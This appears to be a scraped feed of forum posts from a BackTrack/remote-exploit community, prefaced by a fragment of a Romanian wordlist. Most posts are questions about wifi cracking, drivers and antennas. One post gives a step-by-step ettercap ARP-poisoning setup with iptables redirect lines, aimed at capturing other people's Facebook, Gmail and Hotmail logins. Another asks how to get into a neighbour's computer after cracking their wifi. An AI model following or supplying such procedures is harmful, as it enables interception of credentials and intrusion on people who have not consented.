aberante/L
aberant/IW
aberatia/PZ
aberatii/GL
abereze/AZ
......
I also have to mention that this is a Romanian wordlist, and it is the only one I could find.
-
10:06
»
remote-exploit & backtrack
Hello,
Well, I'm new to the BT place, a great package IMHO to learn.
I'm not here to post problems, wrong-place posts, etc.
I'm a kind of newbie at wifi reversing; my location didn't allow me to test it in real mode.
My question is simple: after reading many tutorials and vids, something is not answered for me.
If I hack a WEP or WPA (with an easy pass), may I be able to gain access to the weak host's files? (I mean the guy or girl sharing his AP with a weak pw.)
How to get access to his computer once the wifi is hacked?
Well, I don't expect a vid tut to do it ;) but what to do if so.
Thanks!!
-
-
12:28
»
remote-exploit & backtrack
:confused: How do you type - or this -- in the console? When I type it in the console I get /
-
7:27
»
remote-exploit & backtrack
Hello everyone,
I have a problem that has been stumping me for quite a while.
My laptop runs Windows Vista; I installed Linux BackTrack 3 as a second boot (and soon version 4) and unfortunately, on this Linux, my Wi-Fi network card is not installed, so there is no way to access the Internet. I would like to know what I need to do to install the driver for this card and get everything working, so that I can finally do what I need to do for my final-year school project.
Regards,
bil0ute
-
7:21
»
remote-exploit & backtrack
Hello everyone. I have a question: why isn't the handshake generated with the aireplay-ng ... command, when there is more than one client connected on a WPA network?
Thanks and regards
-
-
10:59
»
remote-exploit & backtrack
Greetings to all.
I installed bt4 on a PC with 3 wireless interfaces. I used wicd to configure the connection to my network on one of the three interfaces, to control the PC remotely (vnc-ssh).
Needing to connect another interface to another network, I realized that I can't use wicd-client, because it disconnects me from the default network.
I tried with iwconfig without success. I wanted to use wpa_supplicant but I can't find the configuration file in the usual path /etc/wpa_supplicant/wpa_s..conf.
Thanks if anyone can help me.
-
7:01
»
remote-exploit & backtrack
I would like to buy a new antenna, fully compatible with BackTrack, that supports monitor mode and packet injection. Some time ago I had found an 18db Zydas ZD1211RW, which unfortunately I let slip away :-(( Now I am thinking of going for an ALFA AWUS036H 1000mw (Realtek 8187L) with a 7 or 5db antenna... could that work?? Is the 500mw version better, to also have the new N band?
Thanks for the advice
-
-
6:37
»
remote-exploit & backtrack
Hi everyone... I am practicing with ettercap now but I have problems sniffing Gmail, Facebook and Hotmail data. So the procedure I follow is:
I connect to the wifi network, e.g. 1234.. I am connected
2 I go to /etc/ettercap.conf and modify the 2 strings like this:
- redir_command_on = "ipchains -A input -i %iface -p tcp -s 0/0 -d 0/0 %port -j REDIRECT %rport"
- redir_command_off = "ipchains -D input -i %iface -p tcp -s 0/0 -d 0/0 %port -j REDIRECT %rport"
- redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
- redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
without the # things
I save and close.
Then I open internet/ettercap and connect to my interface wlan1
scan for host, and it searches for the connected hosts
hostlist
then I select the default gateway and click add to target1
then under mitm - arp poisoning I tick the two options and confirm
then start sniffing
that's all..
but when I log in to, e.g., Facebook from the other computer, it detects that I connected to the facebook.com site but it doesn't capture the login..
Why?? What am I doing wrong?? Please reply, helppp :confused ::(
-
4:36
»
remote-exploit & backtrack
Hi everyone, I have just installed bt4 on the hard disk. It gives me only one problem: when I turn on the PC, XP starts automatically. How do I configure it so that at startup it gives me the option to choose between the two hard :confused: disks? Edit: in theory it should have created a 9 GB partition with bt4 on it; how come XP doesn't recognize it, while if I boot the bt4 live CD it does recognize it.. hmm
-
-
16:42
»
remote-exploit & backtrack
I set up a wireless network with WPA/TKIP encryption to try to crack it.
I got the hash in a .cap file. I'd like to know if I can get the hash out of the cap file. I know I can run aircrack or cowpatty on the cap file with a wordlist or rainbow table, but I'm curious about how to find the hash. I also would like to know if I can try to crack it like it was an MD5 hash.
Thanks for the attention.
-
10:51
»
remote-exploit & backtrack
Hi everyone,
well, let me tell you, I'm new to this forum and I've had a problem with this program :/
I have BackTrack 3, an Atheros AR5005G card and a tutorial to get the software working.....
I do all the steps and up to there everything is fine, but when I want to inject I get this:
Sending Authentication Request
Sending Authentication Request
Sending Authentication Request
about 5 or 6 more times, and then I get about 6 options for why it could not inject
Any help please??
Thanks
-
8:22
»
remote-exploit & backtrack
Hi guys, my Alfa has just arrived.. I am running some tests with NetStumbler to see the signal of the various networks, and judging by the signal strength they have, it is as if they were all networks in my own home.. but when I connect to a network the connection is slow.. slower than the speed I got with the other Alice dongle I had.. :(:( This is the network I connect to..
-
7:01
»
remote-exploit & backtrack
Is a 14 dBi directional antenna better than an omnidirectional antenna with less dBi, but at the same price?
-
-
17:18
»
remote-exploit & backtrack
For the past two weeks I have been messing with cracking WPA and WPA2 networks. I have scoured the forums here as well as googled enough that it now only suggests WPA-related topics lol.
But from what I've concluded, it seems that WPA2 is quite possibly as secure as we need, as long as you have a secure password.
My rationale is that because a person can literally make anything their password, most wordlists would not be able to crack it. If someone makes their password with just their last name and, say, their birthday (i.e. Martin04221966), most password lists would not be able to crack that.
So, I guess my overall question is for someone to correct me if I'm wrong in saying that if a password includes a proper noun or multiple words plus numbers, the WPA attack would not be able to crack the password.